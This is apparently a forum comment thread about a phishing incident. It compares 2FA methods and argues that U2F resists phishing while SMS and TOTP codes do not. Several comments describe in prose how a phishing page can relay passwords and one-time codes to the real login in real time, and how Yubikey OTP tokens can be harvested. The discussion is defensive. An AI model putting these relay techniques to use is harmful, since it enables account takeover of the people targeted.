2 factor authentication is key here. The ubikey is a gold standard for business - no one should do serious business without it!
For everyone else, I think the new 2fa Google App approach is better. When you go to login, your Google App pushes a notification to your phone and you have to click on it. This raises the bar to doing a simultaneous login, which isn't impossible, but even if it weeds out a large number of attacks for now, it's worth it!
If I was going to do a Google Phishing page - I would take the username + password that the user supplied into MY fake page, and POST/CURL that to the Google login.
If Google returns asking for a 2factor to MY fake, I would display the 2 factor prompt to the user, and get them to type the 2-factor into my page, which I would pass back to Google.
Basically you can use a phishing page as a MITM attack.
When you auth against Google with 2-factor, there is a "remember this computer" option - giving the attacker at least 30 days of access to your email without needing a further 2-factor code.
So if the person is tricked enough to type their username+password into a fake google page, they are just as likely to follow through with their 2-factor code.
This is where the type of MFA matters a lot: with a TOTP code, that phishing attack will be successful.
With U2F, however, a per-host keypair is generated during the setup process and the public key is given to the remote server. Critically, the hostname as seen by your browser is part of the key identifier: see http://security.stackexchange.com/a/71704/311
That means that if in the future even if someone convinces you to visit their phishing site and activate the token, the login attempt will still fail because the hostname as seen by the browser won't match a key on the token.
It depends on which 2FA method you use, and there's an associated time window. The TOTP method (Google Authenticator App) of a rotating number must be used within a window of at most a few minutes -- new numbers are generated every 30 seconds, so they could use that if they logged in immediately.
If you use U2F, then the domain name difference will mean that the U2F key can never match unless the attacker has control over DNS and is issued a Google.com SSL certificate by an authority the target's computer trusts.
If a server is making the proxied request, would this still matter? The server will pretend to be a legit browser submission?
In your link they mention reply. But what about a browser you control on the server?
Your browser connects to Google and tells the U2F token to auth using the www.google.com key: works
Your browser connects to www.google.com@phish.me but no matter whether you believe that site to be Google, the U2F process means that it can only use a key for phish.me, which won't work on the Google.com servers even if they relay it.
The only attack which still works is if they control DNS and can forge an SSL certificate, at which point we have much bigger problems than phishing.
> The only attack which still works is if they control DNS and can forge an SSL certificate
Or if they're able to get some malware onto your system permitting them to change your dns servers or alter your hosts file, and add certificates to your OS/browser trust store.
Both of those fall into “control of DNS” or “forging an SSL certificate”. Besides, if they can do either of those things they don't need to phish you because they can just hijaack your existing browser when you login to the real site.
Sure, but that's raising the bar a hell of a lot higher than where it is currently, where all you need is a HTML email message that happens to superficially resemble something a random person might expect Google to send.
And in the long run I have more faith in making systems more secure via technological means than to try and convince users not to click on links in shady email messages. So by moving the problem into the technology domain and out of the social domain, I'd say it's a big win.
I have been working on stopping phishing for the last year and have read many malware analysis reports. Domain whitelisting will make it much harder for the attackers.
I just announced beta of host based DNS whitelisting app. It trusts top 10,000 domains, then user has to allow other domains.
To be clear, there is no real mutual authentication between the server and the token. The server can authenticate tokens (after first registrations) but not the other way. (You have to get outside FIDO U2F specifications if you want to do so.) With standard FIDO U2F USB tokens, the server authentication is done through SSL on the client application level (most of the time : a web browser).
I'm waiting for the day in which I can sign up for 2FA without giving my phone number. At this point, I believe they are holding it on purpose, as my phone number is a much more reliable unique identifier than my username and/or cookies.
(Yes, you can use the Google authenticator, but no, you can't do it if you haven't given your phone number first)
Edit: by "they" I mean GMail - other sites work just fine.
To use google authenticator you do not need to give out your number. Most sites will have a qr code you can scan with your phone and the google authenticator app uses that to generate 2fa codes that are valid within a certain time frame.
You could create a Google Voice account with a free number and link to that. Set it up so calls/sms/etc go nowhere but can be changed if you need to restore your Gmail account later with that number.
How recently have you tried to do so? I tried a couple of months ago to set up a Gmail account with a Google Voice number for verification, and it refused to let me with a message which I recall as being vaguely like "This is not an acceptable verification number".
Well, on a phishing page the user could still type in the username and password before clicking submit. Only after submitting the username and password do authentication layers require the user to interact with their mobile device (which is usually how it works). Some users might forget that they are supposed to 2FA (say, on their first few days at the job).
What if the password input would only be shown after the user typed in their username, pressed submit and confirmed that they were trying to log in using their mobile device?
Adding 2fa does not completely close the exploit window, but it does reduce it considerably. Even if the phishing page prompted for 2fa, those credentials would only be valid for the next ~60-120 seconds, so any attack would have to be staged very quickly.
In this example, they waited three days before trying to utilize the broken account; with 2fa they would not have that luxury.
And this (asking for 2fa in the phishing page) would entail a risk as well; if they prompted a user who did not have 2fa for their 2fa credentials, then they would immediately be (at best) confused, and possibly suspicious, so they would have to decide to take the risk as to whether to attempt to target 2fa'ed accounts. And if they don't offer a 2fa prompt, then the phishing attempt has fizzled, as even with the password, they only have one factor.
Any sort of re-ordering of the login process by the good guys is only effective if the customer is extremely suspicious of changes in the login process, which nobody will be. The phishing site is under no obligation to match their flow to that of the faked website unless not matching by itself would be suspicious.
Why couldn't the attacker page pass on the 2fa token immediately to Google and log in as the victim? Then the attacker would have a month or so, not 30 seconds, with which to abuse their account
That's why I said that it narrowed the exploit and what I meant by "[staging] very quickly". It's a more narrow window, and the other objections (like prompting non-2fa users for 2fa) still apply.
If a human has to be involved on the attacker side, then this gets tricky, since they only have a short window where the 2fa is valid. If an automated process is trying to log on, then it is possible that CAPTCHAs would either prevent getting a full interactive session (i.e. just a "read email" level of access, as for an app) or block the attack entirely.
If you are a MITM you don't have to prompt non-2fa users for 2fa. You just replay their credentials, live, on the real site, and if the real site is asking you for 2fa, then you ask the real user for their 2fa.
I think the point here is that, even if you give away your password, the attacker won't be able to access your account, because you're protected by 2FA.
If 2FA was supposed to protect your password from being phished, then it would have to prompt you for your 2FA code every time you log in, which would be pretty annoying.
If you accidentally delete the Google 2FA app, or your phone is stolen / lost, you have to regenerate all the tokens, which can be quite a pain. This happened to me once, and I was lucky I had several 'recovery codes' which I then used to reset the tokens. Personally I would stay clear from a Google-issued 2FA app as they have more reason to track you and the services you use.
Also 2FA can sometimes be overkill, especially if you're constantly logging into accounts which you know will get old and dusty over time (think Yahoo Mail for example)
Google Authenticator doesn't do any kind of push notification when you log in. Each endpoint uses a shared secret (the server and the mobile app share that secret beforehand) to generate a time-limited code.
I don't think I'd call what Google does 2-factor authentication. Unless I'm missing some option to change this behavior, it's still 1-factor, but what changes when you enable it is which factor is the fundamentally required one. With it disabled, you have one factor, the password; anyone who gets it can log on. With it enabled, the password is no longer the single factor, but it is also no longer a required factor at all, because the password-reset mechanism goes through the same phone number used for the 2fa SMS pushes. So now the phone (or more specifically, ability to receive SMSs to the saved number) becomes the single factor. To be actual 2fa, someone in possession of only one of the two factors shouldn't be able to override the other factor.
There are obvious reasons Google does it this way, and it is probably a net increase in security, because a phone as a single factor is less often compromised than a password as a single factor. But I don't like calling that particular arrangement 2fa.
This phishing test company has one of their employees steal a reporter's cell phone and it's amazing. She basically plays a crying baby on youtube and just grabs the account without knowing anything...
2FA using a phone number isn't really 2FA, as you've said. There's a reason this method has been deprecated by the NIST and other folks making recommendations about this.
Used correctly, their TOTP app is a real second factor, because it only lives on a single device that you have.
To be precise: Google's hardware 2FA support will work with any security key supporting the FIDO U2F protocol.
Yubikey devices are U2F compatible. (And in my opinion one of the best devices out there, thanks to PGP/SSH smartcard support.) But there are also cheaper versions on Amazon that work just as well if you're on a budget.
https://tozny.com/ sells a service that enables this for any app, not just Google.
I have a Yubikey and I find it too obnoxious for day-to-day use. I'd rather use an authenticator app (such as Google's or LastPass').
For TOTP on non-Google sites, I find LastPass better than Google's Authenticator. First, LastPass locks the app with a PIN. Second, it can work with the browser extension to fill out those 6-digit codes for you.
Google provides a Chrome extension that alerts you (and an administrator) if you accidentally enter your Google password on a site that isn't accounts.google.com: https://github.com/google/password-alert
Don't forget that the LastPass chrome extension has been tricked in the past to extract passwords from arbitrary domains. It's still important to use your brain when clicking links and invoking LastPass's autofill functions.
That's why I love and recommend password managers to all my friends / relatives. Not only does it help prevent phishing but it promotes stronger passwords.
Likewise - if Firefox doesn't automatically fill in a password that I expect it to, something strange is going on. (Especially now that Firefox automatically uses http credentials for the same page on https, which removes the one other common reasons for this to happen.)
While I also don't like sites breaking autocomplete, LastPass' "Show matching sites" dropdown only lists accounts valid for the current domain. So a very similar protection is available even without autocomplete.
This article seems great at describing how phishing actually works in practice, especially to people without much exposure to technology. I've gone through at least a couple of training emails from IT departments about phishing, and this was way more effective. A realistic case-study with a really clear description is valuable!
This article could definitely augment the anti-phishing education at your organization—the only downside is that it's a bit long, so busy people probably won't want to read it :/.
Education is key. A great way to do that is with http://phishme.com/, were you can also assess how vulnerable you'd be. The bad thing is that convincing an IT department to use it and maybe embarrass other people, specially technical, is hard.
The beginning of the story is missing. PZ clicked on the link in the email because it was "received [...] from a familiar mailing list".
Did PZ trust a mailing list where anyone could post? Or did the attackers spoof the "from" field? The former may have been prevented by employee training, the latter by SPF or similar technologies.
In my experience if you use multiple Google accounts you get login prompts all the time: half the time the Google Doc/Drive link requires me to switch to another account, and occasionally asking for password confirmation as well.
Hi, I'm the author of that blog post. The backstory is that, indeed, the "familiar mailing list" had been compromised; the attack was conveyed to us in much the same way as we passed it on to others.
Yeah it is really good, and I'd like to post it on my fb, but it says nothing about how to protect against phishing, Ie. check the url. (Even that I'm not so sure about.)
Many people won't check the url when signing in if everything looks to be on the up and up. This is why I really liked one of the things Yahoo did which was create a sign-in seal. Every time you signed in Yahoo would display a custom image that you set and if that image wasn't there then something was probably wrong.
I don't think it's gullible for a user to proceed when they see a site missing an image, I think it's gullible that an engineer expects that the user would notice without any actual evidence. seems like a cardinal sin of engineering - don't assume your users will behave a certain way.
I've run into several websites that use the "security image", and to be honest most of them I don't actually remember what they are until I see them. I can't choose the image myself, so one of them is something banal like a toaster. If I see the toaster, okay, I'm good. But am I 100% certain that if I see a banana instead that I'll say "Something is amiss here!"? I really don't know.
On the other hand, if I could upload my own security image for each site, I guarantee I would remember it, because I'd probably use something I drew myself.
The bank sets a cookie on your machine and only displays the image if you have the cookie. You won't get the image on a machine you've never used to log in before.
Couldn't the hacker just pass on the username that I assume is being used to select the photo on the real site, and then put that image in place on their fake login site?
But phishers can praxy the 3rd party site to you. And this isn't hard to do. It might help w/ your relatives, but for anything even mildly targeted you can certainly rent a couple t2.nano to pull this off...
We also got hit by this a few months back. It also got send to all of your company's contact. We had to mail all of them back and lost face.
One hour in or so Google made it so that the emails (even those already received and opened) were blocked. It helped to mitigate the issue. Most of the outside contact that would have received the mail received it in their spam.
It seems to me that browsers could be smarter about this kind of thing. Like, "Hey, you just put your Gmail credentials into a non-Gmail login form, did you really mean to do that?"
Obviously in the HN-type crowd, you know to always carefully check the URL of links and form submissions. But I just don't know how realistic it is for that to be expected of an average user.
> Obviously in the HN-type crowd, you know to always carefully check the URL of links and form submissions. But I just don't know how realistic it is for that to be expected of an average user.
How often do you actually check super carefully? I'm pretty sure I'm not as careful as I know I should be. Especially when busy and distracted and thinking about other things.
That would be tough, because most people use one or two email addresses for basically all their accounts. And unless you're storing all their passwords, which would be a sketchy thing to turn on by default, there's no way to tell if they just put in their Gmail credentials or they really meant to log into gmal.ru. And actually even if you're storing their passwords, a lot (most?) people use the same password for lots of different logins. So I don't think there's a way to consistently do this, unless you combine it with a password manager that guarantees the user isn't duplicating passwords across different logins.
Yeah, this specific idea might only work well if you're using a password manager. But it was only an example. It could be something as simple as, "You've never submitted a secure form to this site. Please check the address carefully." If you think it's Gmail, that would be an unexpected alert.
Google needs to add some optional intelligence to Chrome so that when it comes across a site with suspiciously similar design as key google urls by on a unrenognized url, it should warn the user.
Don't those screenshots just show domains crafted deceptively to look like Google domains? I don't see any legitimate Google ones.
> “We are approaching the point in this case where there are only two reasons for why people say there’s no good evidence,” Rid told me. “The first reason is because they don’t understand the evidence—because the don’t have the necessary technical knowledge. The second reason is they don’t want to understand the evidence.”
Is there anywhere we can see this evidence? Objectively I'm curious how an attack which consisted of basic phishing was determined to be definitively supported by the Russian government.
If they broke SHA-256 or coerced a Russian CA to generate a Google certificate, I'd agree... but using bitly and decades-old "click this link to reset your password" links? Come on.
Notice in one of the last screenshots, the link actually points to a real Google.com domain, but in the /amp/ destination, under which a tiny(cc) link was hidden and therefore fetched the content that "seemed like" it came from Google when Google merely acted as a CDN.
I recently saw a link, that I unfortunately can't find, where someone senior affiliated with Defcon or black hat nearly got phished. He was rushing packing in the midst of a flurry of amazon shipments to travel to some conference and got a very well timed phishing email asking him to confirm some sort of shipment details for amazon. He fortunately noticed it was the wrong product, but I seem to remember had started typing his info already.
If someone like that can get nearly fooled, there's little hope for the rest of us or our families.
It's time to give up preventing phishing and start working on amelioration.
ps -- if anybody knows the story I'm talking about, I'd love the link.
Only if you use a U2F hardware token. 2FA using SMS or a smartphone app merely raises the bar for phishing: the attacker can forward the password along to the real service, prompt the user for the 2FA code, forward that along too, and then get a session cookie which they can use to access the account later.
One key difference which made me appreciate the thought which went into U2F: people using password managers can still copy and paste the real password into the form, which they're somewhat trained to do by all of the large websites which don't have / don't have working single sign on.
With U2F that failure mode is impossible since you cannot get the private key to shoot yourself in the foot with, even if the phisher successfully convinces you to try.
You know when your U2F device has been stolen because it's not in your possession anymore. The hardware is meant to be at least tamper-evident, if not tamper-resistant, so an attacker can't just steal the internal secret and put the device back where they found it.
Bytes in a password manager are hard to steal, but if you do steal them, the legitimate owner won't necessarily ever know.
The phisher can just relay your token to establish a login from their end, and still have access to your account. In this article, the attacker created a filter to move all incoming messages to Trash (that doesn't require a token to do), then they deleted the contacts (I don't think that requires a token), and kept an active connection to the Inbox (also doesn't require a token).
I have a USB token that's just a simulated keyboard, it doesn't do anything fancy like checking which URL I'm on. So, perhaps some do that, but definitely not all.
Yep. This same phishing attack reached our office a few months back - it was a good motivating force for the whole office to enable 2FA. Probably an overall net positive for the company :)
At my company we get these things 2-3 times a year.
Surprisingly many people understand that there is something fishy. But "Surprisingly many" is not enough.
2FA is not enough here a user that does not have the required knowledge to see what is phishing and what is not will most likely enter the 2FA key giving the bad guys the auth tokens anyway.
At my workplace we hire a company to do occasional phishing attacks on employees. If you get got (I have been got) you are briefly made to feel foolish and have to do a training course. They release stats and like you I was surprised how few people fall for it. But people always fall for it. I think this forced exposure to phishing attacks is an excellent idea.
Newer Yubikeys support U2F, which I haven't seen any way to phish yet, but the Yubikey protocol is still possible to phish.
To do this, the fake login page says that the token was incorrect the first time (which would possibly alert some people, but certainly not everyone), and then when the user submits a second token, the phishing site sends the first one to the real site. They now have an unused token which can be used up until the user logs into another website (thus invalidating the 'unused' one).
> What makes an attack like this so effective is that you never expect to see something as convincing as this
I've been working on phishing and counter-phishing recently, and if someone is actually putting any effort in, you have to expect something like this. Very legitimate looking email, the correct signature (complete with up to date font/logo), and a virtually perfect copy of the login page to whatever service they're using. All of this, even just to target a single person, is under 8 hours of work, which is to say, it's a simple task for someone who really wants to phish you.
The article mentions having an IDS and disaster recovery plans, and this is the best you can hope for as pretty much everyone is susceptible to this, and AI still can be beaten.
Then you may be able to answer this question: is it really a problem that those people accessed the link but didn't login? Because sure you could put malware on it, but that's possible on any website.
Yes, but in theory some sort of MAC could stop it from accessing important files, or anti-virus could detect it and stop it too. But once the password leaves the computer, it's going to take a lot more effort to mitigate the damage. Also, your browser is on your side for protecting against malware, so for example if you have Flash disable, that's a whole vector you can just ignore.
Ok, this article is great and I'd like to share it with all my friends. BUT, it says nothing about how to mitigate against phishing and so ... would leave the average internet user just vaguely paranoid, which is not helpful.
I'd like to contact the author and get him to append something about "check the url". But I guess they are not advertising their email addresses anymore :-)
This just shows that password-based authorization doesn't work for normal (not computed engineers) people and needs to be replaced with physical cryptographic keys. This is a script kiddie level attack any teenager can do and it succeeded.
It's surprising that a dedicated phisher would go so blatantly overboard, knowing it would stand like a sore thumb. This wasn't spearphishing, it was regular phishing in a pond.
In my vision of the future, most devices will not have a default gateway.
Instead, everything will be forced through application layer proxy servers which inspect the traffic and decide whether to let it pass. This would include domain whitelisting, as you mentioned, content filtering and inspection, and/or anything else the {company,"protection service",user} wanted to add.
I have no doubt that eventually, someday, we will live in a world where our electronic devices default to deny.
It's worth nothing the new user-image-before-password-input for Google is an anti-phishing feature. Of course, most people won't think that deeply when prompted with a password request and a similar UI.
Then how does the image consistently display before the password has been provided? No matter what the answer is, I don't see how it could be an anti-phishing feature.
I use fresh incognito tabs constantly. So I guess I'll never see the image, and never know something is amiss.
By I also never click an email link to login unless it's a plain text password reset. I receive authentic looking and topical Dropbox share requests from actual contacts (who have been hacked) trying to phish my Dropbox credentials maybe 4-5 times a year so I'm always on the lookout for it. This is a classic attack. Always check the URL!
It's partially because you can sign in with custom domains. By putting your email address in first, Google can figure out what signin mechanism to use prior to you inputting your password (or not, if you don't need one).
For example, we use Google Apps at work with our custom domain, with an internal SSO server providing authentication services. You enter your email address, the Google page directs you to the internal SSO server, you get a token, take that back to Google, and you get logged in - no password required.
When you first go to a Google sign-on, it asks for your email. Once you input your email, it then shows you the profile picture corresponding to the account, and asks you to input the password. If the account has no profile picture, the icon is blue instead of gray. (Tested in Incognito mode)
That's not correct. If you sign on from an unrecognized computer, it doesn't show your photo. Using incognito mode doesn't make you "unrecognized;" you need to have a different IP.
I never heard of SQRL specifically before, so I just spent some time researching it. From what I can find, it has some significant flaws[0], and it doesn't seem these can be addressed without defeating the few advantages this SQRL approuch has.
For everyone else, I think the new 2fa Google App approach is better. When you go to login, your Google App pushes a notification to your phone and you have to click on it. This raises the bar to doing a simultaneous login, which isn't impossible, but even if it weeds out a large number of attacks for now, it's worth it!